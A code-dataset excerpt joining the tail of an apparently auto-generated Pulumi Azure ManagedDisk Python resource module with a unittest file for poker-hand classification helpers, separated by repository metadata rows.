        :param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
        :param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
        :param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        :param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        :param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        :param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        :param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        :param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
        :param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
        :param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        :param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ManagedDiskArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a managed disk.

        ## Example Usage
        ### With Create Empty

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_managed_disk = azure.compute.ManagedDisk("exampleManagedDisk",
            location="West US 2",
            resource_group_name=example_resource_group.name,
            storage_account_type="Standard_LRS",
            create_option="Empty",
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        ```
        ### With Create Copy

        ```python
        import pulumi
        import pulumi_azure as azure

        example = azure.core.ResourceGroup("example", location="West Europe")
        source = azure.compute.ManagedDisk("source",
            location="West US 2",
            resource_group_name=example.name,
            storage_account_type="Standard_LRS",
            create_option="Empty",
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        copy = azure.compute.ManagedDisk("copy",
            location="West US 2",
            resource_group_name=example.name,
            storage_account_type="Standard_LRS",
            create_option="Copy",
            source_resource_id=source.id,
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        ```

        ## Import

        Managed Disks can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:compute/managedDisk:ManagedDisk example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/microsoft.compute/disks/manageddisk1
        ```

        :param str resource_name: The name of the resource.
        :param ManagedDiskArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Decide which overload the caller used: if a ManagedDiskArgs object was
        # supplied, expand it into keyword arguments; otherwise pass the
        # keyword arguments straight through to _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(ManagedDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       create_option: Optional[pulumi.Input[str]] = None,
                       disk_access_id: Optional[pulumi.Input[str]] = None,
                       disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
                       disk_iops_read_only: Optional[pulumi.Input[int]] = None,
                       disk_iops_read_write: Optional[pulumi.Input[int]] = None,
                       disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
                       disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
                       disk_size_gb: Optional[pulumi.Input[int]] = None,
                       encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
                       gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
                       hyper_v_generation: Optional[pulumi.Input[str]] = None,
                       image_reference_id: Optional[pulumi.Input[str]] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       logical_sector_size: Optional[pulumi.Input[int]] = None,
                       max_shares: Optional[pulumi.Input[int]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       network_access_policy: Optional[pulumi.Input[str]] = None,
                       on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
                       os_type: Optional[pulumi.Input[str]] = None,
                       public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       source_resource_id: Optional[pulumi.Input[str]] = None,
                       source_uri: Optional[pulumi.Input[str]] = None,
                       storage_account_id: Optional[pulumi.Input[str]] = None,
                       storage_account_type: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       tier: Optional[pulumi.Input[str]] = None,
                       trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
                       zones: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Normalize/validate resource options before registering the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a brand-new resource: __props__ must not be supplied by
            # callers; it is only used internally by ManagedDisk.get().
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ManagedDiskArgs.__new__(ManagedDiskArgs)

            # create_option, resource_group_name and storage_account_type are
            # required unless this registration resolves an existing resource
            # by URN (opts.urn set), in which case the engine supplies state.
            if create_option is None and not opts.urn:
                raise TypeError("Missing required property 'create_option'")
            __props__.__dict__["create_option"] = create_option
            __props__.__dict__["disk_access_id"] = disk_access_id
            __props__.__dict__["disk_encryption_set_id"] = disk_encryption_set_id
            __props__.__dict__["disk_iops_read_only"] = disk_iops_read_only
            __props__.__dict__["disk_iops_read_write"] = disk_iops_read_write
            __props__.__dict__["disk_mbps_read_only"] = disk_mbps_read_only
            __props__.__dict__["disk_mbps_read_write"] = disk_mbps_read_write
            __props__.__dict__["disk_size_gb"] = disk_size_gb
            __props__.__dict__["encryption_settings"] = encryption_settings
            __props__.__dict__["gallery_image_reference_id"] = gallery_image_reference_id
            __props__.__dict__["hyper_v_generation"] = hyper_v_generation
            __props__.__dict__["image_reference_id"] = image_reference_id
            __props__.__dict__["location"] = location
            __props__.__dict__["logical_sector_size"] = logical_sector_size
            __props__.__dict__["max_shares"] = max_shares
            __props__.__dict__["name"] = name
            __props__.__dict__["network_access_policy"] = network_access_policy
            __props__.__dict__["on_demand_bursting_enabled"] = on_demand_bursting_enabled
            __props__.__dict__["os_type"] = os_type
            __props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["source_resource_id"] = source_resource_id
            __props__.__dict__["source_uri"] = source_uri
            __props__.__dict__["storage_account_id"] = storage_account_id
            if storage_account_type is None and not opts.urn:
                raise TypeError("Missing required property 'storage_account_type'")
            __props__.__dict__["storage_account_type"] = storage_account_type
            __props__.__dict__["tags"] = tags
            __props__.__dict__["tier"] = tier
            __props__.__dict__["trusted_launch_enabled"] = trusted_launch_enabled
            __props__.__dict__["zones"] = zones
        # Register the resource with the Pulumi engine under its type token.
        super(ManagedDisk, __self__).__init__(
            'azure:compute/managedDisk:ManagedDisk',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            create_option: Optional[pulumi.Input[str]] = None,
            disk_access_id: Optional[pulumi.Input[str]] = None,
            disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
            disk_iops_read_only: Optional[pulumi.Input[int]] = None,
            disk_iops_read_write: Optional[pulumi.Input[int]] = None,
            disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
            disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
            disk_size_gb: Optional[pulumi.Input[int]] = None,
            encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
            gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
            hyper_v_generation: Optional[pulumi.Input[str]] = None,
            image_reference_id: Optional[pulumi.Input[str]] = None,
            location: Optional[pulumi.Input[str]] = None,
            logical_sector_size: Optional[pulumi.Input[int]] = None,
            max_shares: Optional[pulumi.Input[int]] = None,
            name: Optional[pulumi.Input[str]] = None,
            network_access_policy: Optional[pulumi.Input[str]] = None,
            on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
            os_type: Optional[pulumi.Input[str]] = None,
            public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            source_resource_id: Optional[pulumi.Input[str]] = None,
            source_uri: Optional[pulumi.Input[str]] = None,
            storage_account_id: Optional[pulumi.Input[str]] = None,
            storage_account_type: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            tier: Optional[pulumi.Input[str]] = None,
            trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
            zones: Optional[pulumi.Input[str]] = None) -> 'ManagedDisk':
        """
        Get an existing ManagedDisk resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
        :param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
        :param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
        :param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        :param pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']] encryption_settings: A `encryption_settings` block as defined below.
        :param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
        :param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
        :param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        :param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        :param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        :param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        :param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        :param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
        :param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
        :param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        :param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
        """
        # Attach the provider ID so the engine performs a lookup rather than a create.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ManagedDiskState.__new__(_ManagedDiskState)

        __props__.__dict__["create_option"] = create_option
        __props__.__dict__["disk_access_id"] = disk_access_id
        __props__.__dict__["disk_encryption_set_id"] = disk_encryption_set_id
        __props__.__dict__["disk_iops_read_only"] = disk_iops_read_only
        __props__.__dict__["disk_iops_read_write"] = disk_iops_read_write
        __props__.__dict__["disk_mbps_read_only"] = disk_mbps_read_only
        __props__.__dict__["disk_mbps_read_write"] = disk_mbps_read_write
        __props__.__dict__["disk_size_gb"] = disk_size_gb
        __props__.__dict__["encryption_settings"] = encryption_settings
        __props__.__dict__["gallery_image_reference_id"] = gallery_image_reference_id
        __props__.__dict__["hyper_v_generation"] = hyper_v_generation
        __props__.__dict__["image_reference_id"] = image_reference_id
        __props__.__dict__["location"] = location
        __props__.__dict__["logical_sector_size"] = logical_sector_size
        __props__.__dict__["max_shares"] = max_shares
        __props__.__dict__["name"] = name
        __props__.__dict__["network_access_policy"] = network_access_policy
        __props__.__dict__["on_demand_bursting_enabled"] = on_demand_bursting_enabled
        __props__.__dict__["os_type"] = os_type
        __props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["source_resource_id"] = source_resource_id
        __props__.__dict__["source_uri"] = source_uri
        __props__.__dict__["storage_account_id"] = storage_account_id
        __props__.__dict__["storage_account_type"] = storage_account_type
        __props__.__dict__["tags"] = tags
        __props__.__dict__["tier"] = tier
        __props__.__dict__["trusted_launch_enabled"] = trusted_launch_enabled
        __props__.__dict__["zones"] = zones
        return ManagedDisk(resource_name, opts=opts, __props__=__props__)

    # Output property accessors: each forwards to the Pulumi property store
    # under the snake_case key, exposed to the engine via its camelCase name.
    @property
    @pulumi.getter(name="createOption")
    def create_option(self) -> pulumi.Output[str]:
        """
        The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
        """
        return pulumi.get(self, "create_option")

    @property
    @pulumi.getter(name="diskAccessId")
    def disk_access_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of the disk access resource for using private endpoints on disks.
        """
        return pulumi.get(self, "disk_access_id")

    @property
    @pulumi.getter(name="diskEncryptionSetId")
    def disk_encryption_set_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
        """
        return pulumi.get(self, "disk_encryption_set_id")

    @property
    @pulumi.getter(name="diskIopsReadOnly")
    def disk_iops_read_only(self) -> pulumi.Output[int]:
        """
        The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
        """
        return pulumi.get(self, "disk_iops_read_only")

    @property
    @pulumi.getter(name="diskIopsReadWrite")
    def disk_iops_read_write(self) -> pulumi.Output[int]:
        """
        The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        """
        return pulumi.get(self, "disk_iops_read_write")

    @property
    @pulumi.getter(name="diskMbpsReadOnly")
    def disk_mbps_read_only(self) -> pulumi.Output[int]:
        """
        The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_only")

    @property
    @pulumi.getter(name="diskMbpsReadWrite")
    def disk_mbps_read_write(self) -> pulumi.Output[int]:
        """
        The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_write")

    @property
    @pulumi.getter(name="diskSizeGb")
    def disk_size_gb(self) -> pulumi.Output[int]:
        """
        Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        """
        return pulumi.get(self, "disk_size_gb")

    @property
    @pulumi.getter(name="encryptionSettings")
    def encryption_settings(self) -> pulumi.Output[Optional['outputs.ManagedDiskEncryptionSettings']]:
        """
        A `encryption_settings` block as defined below.
        """
        return pulumi.get(self, "encryption_settings")

    @property
    @pulumi.getter(name="galleryImageReferenceId")
    def gallery_image_reference_id(self) -> pulumi.Output[Optional[str]]:
        """
        ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
        """
        return pulumi.get(self, "gallery_image_reference_id")

    @property
    @pulumi.getter(name="hyperVGeneration")
    def hyper_v_generation(self) -> pulumi.Output[Optional[str]]:
        """
        The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "hyper_v_generation")

    @property
    @pulumi.getter(name="imageReferenceId")
    def image_reference_id(self) -> pulumi.Output[Optional[str]]:
        """
        ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
        """
        return pulumi.get(self, "image_reference_id")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter(name="logicalSectorSize")
    def logical_sector_size(self) -> pulumi.Output[int]:
        """
        Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "logical_sector_size")

    @property
    @pulumi.getter(name="maxShares")
    def max_shares(self) -> pulumi.Output[int]:
        """
        The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        """
        return pulumi.get(self, "max_shares")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="networkAccessPolicy")
    def network_access_policy(self) -> pulumi.Output[Optional[str]]:
        """
        Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        """
        return pulumi.get(self, "network_access_policy")

    @property
    @pulumi.getter(name="onDemandBurstingEnabled")
    def on_demand_bursting_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "on_demand_bursting_enabled")

    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> pulumi.Output[Optional[str]]:
        """
        Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        """
        return pulumi.get(self, "os_type")

    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Whether it is allowed to access the disk via public network. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the Managed Disk should exist.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="sourceResourceId")
    def source_resource_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
        """
        return pulumi.get(self, "source_resource_id")

    @property
    @pulumi.getter(name="sourceUri")
    def source_uri(self) -> pulumi.Output[str]:
        """
        URI to a valid VHD file to be used when `create_option` is `Import`.
        """
        return pulumi.get(self, "source_uri")

    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")

    @property
    @pulumi.getter(name="storageAccountType")
    def storage_account_type(self) -> pulumi.Output[str]:
        """
        The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
        """
        return pulumi.get(self, "storage_account_type")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def tier(self) -> pulumi.Output[str]:
        """
        The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        """
        return pulumi.get(self, "tier")

    @property
    @pulumi.getter(name="trustedLaunchEnabled")
    def trusted_launch_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "trusted_launch_enabled")

    @property
    @pulumi.getter
    def zones(self) -> pulumi.Output[Optional[str]]:
        """
        A collection containing the availability zone to allocate the Managed Disk in.
        """
        return pulumi.get(self, "zones")
| 56.724794
| 567
| 0.687418
| 11,701
| 89,455
| 5.025895
| 0.029912
| 0.073697
| 0.081417
| 0.05387
| 0.970293
| 0.964818
| 0.959546
| 0.956417
| 0.954751
| 0.948391
| 0
| 0.003263
| 0.218825
| 89,455
| 1,576
| 568
| 56.760787
| 0.838294
| 0.418881
| 0
| 0.894795
| 1
| 0
| 0.125519
| 0.040392
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168328
| false
| 0.001107
| 0.007752
| 0
| 0.276855
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7134798ad8fd291a01a5ad4a7e804d71864736c5
| 7,469
|
py
|
Python
|
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
import unittest
from hand_selector.domain.card import Card
from hand_selector.domain.deck_suite import DeckSuite
from hand_selector.domain.deck_value import DeckValue
from hand_selector.hands_helper import HandsHelper
class TestHandsHelper(unittest.TestCase):
    """Unit tests for the HandsHelper poker-hand classification predicates.

    Each test builds five Card objects and checks one classifier
    (straight, flush, royal flush, four of a kind, full house,
    three of a kind, two pair, one pair) for a positive and a
    negative example.
    """

    @staticmethod
    def _hand(*specs):
        """Build a list of Card objects from (suite, value) pairs."""
        return [Card(suite, value) for suite, value in specs]

    def test_is_straight_should_return_true_if_cards_are_ordered(self):
        # Five consecutive values, mixed suites.
        low_run = self._hand(
            (DeckSuite.TILES, DeckValue.SIX),
            (DeckSuite.TILES, DeckValue.SEVEN),
            (DeckSuite.HEARTS, DeckValue.EIGHT),
            (DeckSuite.TILES, DeckValue.NINE),
            (DeckSuite.CLOVERS, DeckValue.TEN),
        )
        self.assertTrue(HandsHelper.is_straight(*low_run))
        # Highest possible run: ten through ace.
        high_run = self._hand(
            (DeckSuite.TILES, DeckValue.TEN),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.QUEEN),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.CLOVERS, DeckValue.ACE),
        )
        self.assertTrue(HandsHelper.is_straight(*high_run))

    def test_is_straight_should_return_false(self):
        # Gap between three and eight breaks the run.
        hand = self._hand(
            (DeckSuite.TILES, DeckValue.TWO),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.TILES, DeckValue.EIGHT),
            (DeckSuite.TILES, DeckValue.NINE),
            (DeckSuite.CLOVERS, DeckValue.ACE),
        )
        self.assertFalse(HandsHelper.is_straight(*hand))

    def test_is_flush_should_return_true_if_cards_are_of_one_kind(self):
        # All five cards share the TILES suite.
        hand = self._hand(
            (DeckSuite.TILES, DeckValue.TWO),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.TILES, DeckValue.EIGHT),
            (DeckSuite.TILES, DeckValue.NINE),
            (DeckSuite.TILES, DeckValue.ACE),
        )
        self.assertTrue(HandsHelper.is_flush(*hand))

    def test_is_flush_should_return_false(self):
        # One HEARTS card among TILES spoils the flush.
        hand = self._hand(
            (DeckSuite.TILES, DeckValue.TWO),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.TILES, DeckValue.SEVEN),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.ACE),
        )
        self.assertFalse(HandsHelper.is_flush(*hand))

    def test_is_royal_flush_should_return_true_if_deck_is_flush_and_straight_flush(
        self
    ):
        # Ten-to-ace run, all one suite.
        hand = self._hand(
            (DeckSuite.TILES, DeckValue.TEN),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.QUEEN),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.TILES, DeckValue.ACE),
        )
        self.assertTrue(HandsHelper.is_royal_flush(*hand))

    def test_is_royal_flush_should_return_false(self):
        # Same suite but the TWO breaks the ten-to-ace run.
        hand = self._hand(
            (DeckSuite.TILES, DeckValue.TEN),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.TWO),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.TILES, DeckValue.ACE),
        )
        self.assertFalse(HandsHelper.is_royal_flush(*hand))

    def test_is_four_of_kind_should_return_true_for_four_cards_with_same_values(self):
        # Four jacks plus a kicker.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.ACE),
        )
        self.assertTrue(HandsHelper.is_four_of_kind(*hand))

